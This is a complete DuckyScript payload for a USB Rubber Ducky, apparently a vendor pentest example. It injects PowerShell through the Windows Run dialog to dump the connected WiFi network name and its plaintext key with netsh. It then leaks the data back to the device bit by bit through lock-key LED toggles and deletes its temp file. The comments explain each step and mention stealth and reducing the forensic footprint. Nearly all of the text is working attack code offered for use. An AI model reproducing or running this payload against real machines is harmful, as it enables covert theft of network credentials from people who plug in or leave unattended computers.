1
REM Example Simple Keystroke Reflection Attack for Windows
2
REM Saves currently connected wireless LAN profile to DUCKY
3
ATTACKMODE HID
4
LED_OFF
5
DELAY 2000
6
SAVE_HOST_KEYBOARD_LOCK_STATE
7
$_EXFIL_MODE_ENABLED = TRUE
8
$_EXFIL_LEDS_ENABLED = TRUE
9

10
REM Store the currently connected WiFi SSID & Key to %tmp%\z
11
GUI r
12
DELAY 100
13
STRINGLN powershell "netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
14
DELAY 100
15

16
REM Convert the stored creds into CAPSLOCK and NUMLOCK values.
17
GUI r
18
DELAY 100
19
STRINGLN powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
20
DELAY 100
21

22
REM Reflect the CAPSLOCK and NUMLOCK Keystrokes back to the Ducky.
23
GUI r
24
DELAY 100
25
STRINGLN powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
26
DELAY 100
27

28
REM The final SCROLLLOCK keystroke indicates EXFIL is complete.
29
WAIT_FOR_SCROLL_CHANGE
30
LED_G
31
$_EXFIL_MODE_ENABLED = FALSE
32
RESTORE_HOST_KEYBOARD_LOCK_STATE
33

34

35

36

37
REM Per the initial ATTACKMODE command. the USB Rubber Ducky will act as a HID keyboard.
38

39
REM SAVE_HOST_KEYBOARD_LOCK_STATE will save the state of the lock key LEDs, as reported by the target, so that they may be restored to their original configuration after the Keystroke Reflection attack is performed.
40

41
REM $_EXFIL_MODE_ENABLED = TRUE will instruct the USB Rubber Ducky to listen for control codes on the USB HID OUT endpoint, saving each change as a bit within loot.bin.
42

43
REM $_EXFIL_LEDS_ENABLED = TRUE will show flash the USB Rubber Ducky LED as loot is saved, useful when debugging. Set as FALSE for a more stealthy operation, however the flash drive case should sufficiently conceal the LED.
44

45
REM The first powershell one-liner, injected into the run dialog, will save the currently connected WiFi network name (SSID) and plaintext passphrase to a temporary file. The file, known as the "loot", is saved as "z" within %TEMP% ($env:tmp\z) directory, encoded in standard ASCII.
46

47
REM The second powershell one-liner will convert the temporary ASCII loot file, bit by bit, into a set of caps lock and num lock key values. It will conclude this file with a final scroll lock value.
48

49
REM The third and final powershell one-liner, in software, will "press" the lock keys indicated by the temporary file via the SendKeys .NET class. The effect of this will be the binary values of the converted loot sent to the USB Rubber Ducky, one bit at a time, via the USB HID OUT endpoint.
50

51
REM Additionally, the temporary file will then be removed. The pentester may consider including additional techniques for obfuscation, optimization and reducing the forensic footprint.
52

53
REM WAIT_FOR_SCROLL_CHANGE will get triggered when the final key "press" from the SendKeys class is executed, thereby continuing the payload.
54

55
REM Finally $_EXFIL_MODE_ENABLED = FALSE will instruct the USB Rubber Ducky to conclude saving the received control codes in loot.bin and RESTORE_HOST_KEYBOARD_LOCK_STATE will restore the lock key LEDs to their original state before the exfiltration began.
56